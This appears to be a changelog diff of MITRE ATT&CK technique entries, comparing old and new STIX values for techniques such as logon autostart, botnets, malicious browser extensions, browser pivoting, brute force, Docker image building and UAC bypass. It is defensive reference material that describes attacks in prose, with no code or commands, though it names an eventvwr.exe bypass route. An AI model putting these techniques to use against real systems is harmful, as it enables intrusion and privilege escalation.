| description | Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel. Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges. | Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel. Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges. |
| external_references[1]['source_name'] | capec | Cylance Reg Persistence Sept 2013 |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/564.html | https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order |
| external_references[2]['source_name'] | Microsoft Run Key | MSDN Authentication Packages |
| external_references[2]['description'] | Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November 12, 2014. | Microsoft. (n.d.). Authentication Packages. Retrieved March 1, 2017. |
| external_references[2]['url'] | http://msdn.microsoft.com/en-us/library/aa376977 | https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx |
| external_references[3]['source_name'] | MSDN Authentication Packages | Microsoft Run Key |
| external_references[3]['description'] | Microsoft. (n.d.). Authentication Packages. Retrieved March 1, 2017. | Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November 12, 2014. |
| external_references[3]['url'] | https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx | http://msdn.microsoft.com/en-us/library/aa376977 |
| external_references[5]['source_name'] | Cylance Reg Persistence Sept 2013 | Linux Kernel Programming |
| external_references[5]['description'] | Langendorf, S. (2013, September 24). Windows Registry Persistence, Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018. | Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel Module Programming Guide. Retrieved April 6, 2018. |
| external_references[5]['url'] | https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order | https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf |
| external_references[6]['source_name'] | Linux Kernel Programming | TechNet Autoruns |
| external_references[6]['description'] | Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel Module Programming Guide. Retrieved April 6, 2018. | Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016. |
| external_references[6]['url'] | https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf | https://technet.microsoft.com/en-us/sysinternals/bb963902 |
| external_references[7]['source_name'] | TechNet Autoruns | capec |
| external_references[7]['url'] | https://technet.microsoft.com/en-us/sysinternals/bb963902 | https://capec.mitre.org/data/definitions/564.html |
| x_mitre_data_sources[0] | File: File Creation | Process: Process Creation |
| x_mitre_data_sources[1] | Windows Registry: Windows Registry Key Creation | Driver: Driver Load |
| x_mitre_data_sources[2] | Windows Registry: Windows Registry Key Modification | Windows Registry: Windows Registry Key Creation |
| x_mitre_data_sources[3] | File: File Modification | Kernel: Kernel Module Load |
| x_mitre_data_sources[4] | Command: Command Execution | Module: Module Load |
| x_mitre_data_sources[5] | Process: Process Creation | Windows Registry: Windows Registry Key Modification |
| x_mitre_data_sources[6] | Module: Module Load | Command: Command Execution |
| x_mitre_data_sources[7] | Kernel: Kernel Module Load | File: File Creation |
| x_mitre_data_sources[8] | Driver: Driver Load | File: File Modification |
| Description |
|---|
| Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely. Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. An adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-27 19:58:02.332000+00:00 | 2022-04-01 19:04:02.610000+00:00 |
| x_mitre_data_sources[0] | Windows Registry: Windows Registry Key Creation | Active Directory: Active Directory Object Modification |
| x_mitre_data_sources[2] | Command: Command Execution | File: File Creation |
| x_mitre_data_sources[3] | Active Directory: Active Directory Object Modification | Command: Command Execution |
| x_mitre_data_sources[4] | File: File Creation | File: File Modification |
| x_mitre_data_sources[5] | File: File Modification | Windows Registry: Windows Registry Key Creation |
| Old Description | New Description |
|---|---|
| Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Instead of purchasing/renting a botnet from a booter/stresser service(Citation: Imperva DDoS for Hire), adversaries may build their own botnet by compromising numerous third-party systems. Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS). | Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Instead of purchasing/renting a botnet from a booter/stresser service, adversaries may build their own botnet by compromising numerous third-party systems.(Citation: Imperva DDoS for Hire) Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-15 03:01:00.271000+00:00 | 2022-04-19 15:55:58.319000+00:00 |
| description | Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Instead of purchasing/renting a botnet from a booter/stresser service(Citation: Imperva DDoS for Hire), adversaries may build their own botnet by compromising numerous third-party systems. Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS). | Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Instead of purchasing/renting a botnet from a booter/stresser service, adversaries may build their own botnet by compromising numerous third-party systems.(Citation: Imperva DDoS for Hire) Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS). |
| external_references[1]['source_name'] | Norton Botnet | Dell Dridex Oct 2015 |
| external_references[1]['description'] | Norton. (n.d.). What is a botnet?. Retrieved October 4, 2020. | Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, October 13). Dridex (Bugat v5) Botnet Takeover Operation. Retrieved May 31, 2019. |
| external_references[1]['url'] | https://us.norton.com/internetsecurity-malware-what-is-a-botnet.html | https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation |
| external_references[3]['source_name'] | Dell Dridex Oct 2015 | Norton Botnet |
| external_references[3]['description'] | Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, October 13). Dridex (Bugat v5) Botnet Takeover Operation. Retrieved May 31, 2019. | Norton. (n.d.). What is a botnet?. Retrieved October 4, 2020. |
| external_references[3]['url'] | https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation | https://us.norton.com/internetsecurity-malware-what-is-a-botnet.html |
| Old Description | New Description |
|---|---|
Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition) Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions. Previous to macOS 11, adversaries could silently install browser extensions via the command line using the profiles tool to install malicious .mobileconfig files. In macOS 11+, the use of the profiles tool can no longer install configuration profiles, however .mobileconfig files can be planted and installed with user interaction.(Citation: xorrior chrome extensions macOS) Once the extension is installed, it can browse to websites in the background,(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions) steal all information that a user enters into a browser (including credentials)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension) and be used as an installer for a RAT for persistence. There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions.(Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command & control.(Citation: Chrome Extension C2 Malware) |
Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition)
Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions.
Previous to macOS 11, adversaries could silently install browser extensions via the command line using the profiles tool to install malicious .mobileconfig files. In macOS 11+, the use of the profiles tool can no longer install configuration profiles, however .mobileconfig files can be planted and installed with user interaction.(Citation: xorrior chrome extensions macOS)
Once the extension is installed, it can browse to websites in the background, steal all information that a user enters into a browser (including credentials), and be used as an installer for a RAT for persistence.(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension)
There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions.(Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command & control.(Citation: Chrome Extension C2 Malware) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-27 19:56:54.161000+00:00 | 2022-04-20 16:46:36.707000+00:00 |
| description | Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition)
Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions.
Previous to macOS 11, adversaries could silently install browser extensions via the command line using the profiles tool to install malicious .mobileconfig files. In macOS 11+, the use of the profiles tool can no longer install configuration profiles, however .mobileconfig files can be planted and installed with user interaction.(Citation: xorrior chrome extensions macOS)
Once the extension is installed, it can browse to websites in the background,(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions) steal all information that a user enters into a browser (including credentials)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension) and be used as an installer for a RAT for persistence.
There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions.(Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command & control.(Citation: Chrome Extension C2 Malware) |
Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition)
Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions.
Previous to macOS 11, adversaries could silently install browser extensions via the command line using the profiles tool to install malicious .mobileconfig files. In macOS 11+, the use of the profiles tool can no longer install configuration profiles, however .mobileconfig files can be planted and installed with user interaction.(Citation: xorrior chrome extensions macOS)
Once the extension is installed, it can browse to websites in the background, steal all information that a user enters into a browser (including credentials), and be used as an installer for a RAT for persistence.(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension)
There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions.(Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command & control.(Citation: Chrome Extension C2 Malware) |
| external_references[1]['source_name'] | Wikipedia Browser Extension | Chrome Extension Crypto Miner |
| external_references[1]['description'] | Wikipedia. (2017, October 8). Browser Extension. Retrieved January 11, 2018. | Brinkmann, M. (2017, September 19). First Chrome extension with JavaScript Crypto Miner detected. Retrieved November 16, 2017. |
| external_references[1]['url'] | https://en.wikipedia.org/wiki/Browser_extension | https://www.ghacks.net/2017/09/19/first-chrome-extension-with-javascript-crypto-miner-detected/ |
| external_references[2]['source_name'] | Chrome Extensions Definition | xorrior chrome extensions macOS |
| external_references[2]['description'] | Chrome. (n.d.). What are Extensions?. Retrieved November 16, 2017. | Chris Ross. (2019, February 8). No Place Like Chrome. Retrieved April 27, 2021. |
| external_references[2]['url'] | https://developer.chrome.com/extensions | https://www.xorrior.com/No-Place-Like-Chrome/ |
| external_references[3]['source_name'] | Malicious Chrome Extension Numbers | Chrome Extensions Definition |
| external_references[3]['description'] | Jagpal, N., et al. (2015, August). Trends and Lessons from Three Years Fighting Malicious Extensions. Retrieved November 17, 2017. | Chrome. (n.d.). What are Extensions?. Retrieved November 16, 2017. |
| external_references[3]['url'] | https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf | https://developer.chrome.com/extensions |
| external_references[4]['source_name'] | xorrior chrome extensions macOS | ICEBRG Chrome Extensions |
| external_references[4]['description'] | Chris Ross. (2019, February 8). No Place Like Chrome. Retrieved April 27, 2021. | De Tore, M., Warner, J. (2018, January 15). MALICIOUS CHROME EXTENSIONS ENABLE CRIMINALS TO IMPACT OVER HALF A MILLION USERS AND GLOBAL BUSINESSES. Retrieved January 17, 2018. |
| external_references[4]['url'] | https://www.xorrior.com/No-Place-Like-Chrome/ | https://www.icebrg.io/blog/malicious-chrome-extensions-enable-criminals-to-impact-over-half-a-million-users-and-global-businesses |
| external_references[5]['source_name'] | Chrome Extension Crypto Miner | Malicious Chrome Extension Numbers |
| external_references[5]['description'] | Brinkmann, M. (2017, September 19). First Chrome extension with JavaScript Crypto Miner detected. Retrieved November 16, 2017. | Jagpal, N., et al. (2015, August). Trends and Lessons from Three Years Fighting Malicious Extensions. Retrieved November 17, 2017. |
| external_references[5]['url'] | https://www.ghacks.net/2017/09/19/first-chrome-extension-with-javascript-crypto-miner-detected/ | https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf |
| external_references[6]['source_name'] | ICEBRG Chrome Extensions | Chrome Extension C2 Malware |
| external_references[6]['description'] | De Tore, M., Warner, J. (2018, January 15). MALICIOUS CHROME EXTENSIONS ENABLE CRIMINALS TO IMPACT OVER HALF A MILLION USERS AND GLOBAL BUSINESSES. Retrieved January 17, 2018. | Kjaer, M. (2016, July 18). Malware in the browser: how you might get hacked by a Chrome extension. Retrieved November 22, 2017. |
| external_references[6]['url'] | https://www.icebrg.io/blog/malicious-chrome-extensions-enable-criminals-to-impact-over-half-a-million-users-and-global-businesses | https://kjaer.io/extension-malware/ |
| external_references[7]['source_name'] | Banker Google Chrome Extension Steals Creds | Catch All Chrome Extension |
| external_references[7]['description'] | Marinho, R. (n.d.). (Banker(GoogleChromeExtension)).targeting. Retrieved November 18, 2017. | Marinho, R. (n.d.). "Catch-All" Google Chrome Malicious Extension Steals All Posted Data. Retrieved November 16, 2017. |
| external_references[7]['url'] | https://isc.sans.edu/forums/diary/BankerGoogleChromeExtensiontargetingBrazil/22722/ | https://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/https:/threatpost.com/malicious-chrome-extension-steals-data-posted-to-any-website/128680/) |
| external_references[8]['source_name'] | Catch All Chrome Extension | Banker Google Chrome Extension Steals Creds |
| external_references[8]['description'] | Marinho, R. (n.d.). "Catch-All" Google Chrome Malicious Extension Steals All Posted Data. Retrieved November 16, 2017. | Marinho, R. (n.d.). (Banker(GoogleChromeExtension)).targeting. Retrieved November 18, 2017. |
| external_references[8]['url'] | https://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/https:/threatpost.com/malicious-chrome-extension-steals-data-posted-to-any-website/128680/) | https://isc.sans.edu/forums/diary/BankerGoogleChromeExtensiontargetingBrazil/22722/ |
| external_references[10]['source_name'] | Chrome Extension C2 Malware | Wikipedia Browser Extension |
| external_references[10]['description'] | Kjaer, M. (2016, July 18). Malware in the browser: how you might get hacked by a Chrome extension. Retrieved November 22, 2017. | Wikipedia. (2017, October 8). Browser Extension. Retrieved January 11, 2018. |
| external_references[10]['url'] | https://kjaer.io/extension-malware/ | https://en.wikipedia.org/wiki/Browser_extension |
| x_mitre_data_sources[4] | File: File Creation | Command: Command Execution |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | File: File Creation |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution |
| Description |
|---|
Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)
A specific example is when an adversary injects software into a browser that allows them to inherit cookies, HTTP sessions, and SSL client certificates of a user then use the browser as a way to pivot into an authenticated intranet.(Citation: Cobalt Strike Browser Pivot)(Citation: ICEBRG Chrome Extensions) Executing browser-based behaviors such as pivoting may require specific process permissions, such as SeDebugPrivilege and/or high-integrity/administrator rights.
Another example involves pivoting browser traffic from the adversary's browser through the user's browser by setting up a proxy which will redirect web traffic. This does not alter the user's traffic in any way, and the proxy connection can be severed as soon as the browser is closed. The adversary assumes the security context of whichever browser process the proxy is injected into. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could potentially browse to any resource on an intranet, such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) or webmail, that is accessible through the browser and which the browser has sufficient permissions. Browser pivoting may also bypass security provided by 2-factor authentication.(Citation: cobaltstrike manual) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-18 12:11:16.808000+00:00 | 2022-02-25 18:58:15.229000+00:00 |
| external_references[4]['url'] | https://cobaltstrike.com/downloads/csmanual38.pdf | https://web.archive.org/web/20210825130434/https://cobaltstrike.com/downloads/csmanual38.pdf |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Logon Session: Logon Session Creation |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Logon Session: Logon Session Creation |
| Description |
|---|
| Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes. Brute forcing credentials may take place at various points during a breach. For example, adversaries may attempt to brute force access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) within a victim environment leveraging knowledge gathered from other post-compromise behaviors such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), [Account Discovery](https://attack.mitre.org/techniques/T1087), or [Password Policy Discovery](https://attack.mitre.org/techniques/T1201). Adversaries may also combine brute forcing activity with behaviors such as [External Remote Services](https://attack.mitre.org/techniques/T1133) as part of Initial Access. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-09-30 19:18:16.672000+00:00 | 2022-04-19 21:28:49.481000+00:00 |
| x_mitre_data_sources[0] | Command: Command Execution | User Account: User Account Authentication |
| x_mitre_data_sources[1] | User Account: User Account Authentication | Command: Command Execution |
| x_mitre_version | 2.3 | 2.4 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | Mohamed Kmal | |
| x_mitre_platforms | Network |
| Description |
|---|
Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote build request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image)
An adversary may take advantage of that build API to build a custom image on the host that includes malware downloaded from their C2 server, and then they then may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) using that custom image.(Citation: Aqua Build Images on Hosts)(Citation: Aqua Security Cloud Native Threat Report June 2021) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it’s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-08-26 16:45:04.924000+00:00 | 2022-04-01 13:04:00.946000+00:00 |
| x_mitre_data_sources[0] | Image: Image Creation | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[1] | Network Traffic: Network Connection Creation | Image: Image Creation |
| x_mitre_data_sources[3] | Network Traffic: Network Traffic Content | Network Traffic: Network Connection Creation |
| x_mitre_version | 1.1 | 1.2 |
| Old Description | New Description |
|---|---|
Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works) If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows) Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as: * eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit) Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass) |
Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box.(Citation: TechNet Inside UAC)(Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)
Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:
* eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)
Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-07-22 21:36:52.458000+00:00 | 2022-04-19 15:11:20.036000+00:00 |
| description | Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)
If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)
Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:
* eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)
Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass) |
Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box.(Citation: TechNet Inside UAC)(Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)
